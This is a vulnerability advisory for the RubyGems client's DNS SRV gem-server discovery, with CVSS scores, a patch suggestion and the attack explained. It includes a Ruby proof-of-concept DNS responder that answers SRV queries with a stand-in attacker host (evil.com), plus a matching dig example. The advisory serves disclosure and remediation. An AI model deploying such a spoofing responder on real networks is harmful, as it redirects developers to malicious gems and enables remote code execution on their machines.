8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.011 Low
EPSS
Percentile
82.4%
Description:
The RubyGems client supports a gem server API discovery functionality,
which is used when pushing or pulling gems to a gem distribution/hosting
server, like RubyGems.org. This functionality is provided via a SRV DNS
request to the users gem source hostname prepended with “_rubygems._tcp.”.
The response to this request tells the RubyGems client (aka: the gem
command) where the users gem server API is. In the default RubyGems
scenario, with a gem source of https://rubygems.org, the users SRV DNS
request and reply will look like this:
~ $ dig srv _rubygems._tcp.rubygems.org +short
0 1 80 api.rubygems.org.
Due to a deficiency in DNS response verification, a MiTM positioned
attacker can poison the DNS response to this record response and force
the client to unknowingly download and install Ruby gems from an attacker
controlled gem server in an alternate security domain. An example of
such a scenario would look like so:
~ $ dig _rubygems._tcp.rubygems.org SRV +short
0 0 53 evil.com/api.rubygems.com.
In such a scenario, the attacker is able to serve the client malicious gem
content, resulting in trivial remote code execution scenarios. For
example, the attacker could simply modify the gem source code and trigger
code execution via the extensions API at install time on the client machine
(a gem trojaning technique described by Ben Smith in his “Hacking with
Gems” presentation at Aloha Ruby Conference in 2012 -
https://www.youtube.com/watch?v=z-5bO0Q1J9s)/
This vulnerability has the same net effect/impact as CVE-2015-3900 and
CVE-2015-4020.
Affected method in Gem::RemoteFetcher:
PoC DNS SRV Responder:
#!/usr/bin/env ruby
require 'rubydns'
require 'rubydns/system'
INTERFACES = [
[:udp, "0.0.0.0", 53],
[:tcp, "0.0.0.0", 53]
]
Name = Resolv::DNS::Name
IN = Resolv::DNS::Resource::IN
RubyDNS::run_server(:listen => INTERFACES) do
match(//, IN::SRV) do |transaction|
transaction.respond!(0,0,53,"evil.com/api.rubygems.com")
end
end
Recommendations:
Consider this small patch to address the immediate attack vector…
- if /\.#{Regexp.quote(host)}\z/ =~ target
+ if (/\.#{Regexp.quote(host)}\z/ =~ target) && !target.include?("/")
Also, consider moving away from doing API discovery via DNS. Would recommend
moving to HTTPS, where you will have a stronger transport security chain.
References (these are not new, just references prior work here to help triage team understand impact):
8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.011 Low
EPSS
Percentile
82.4%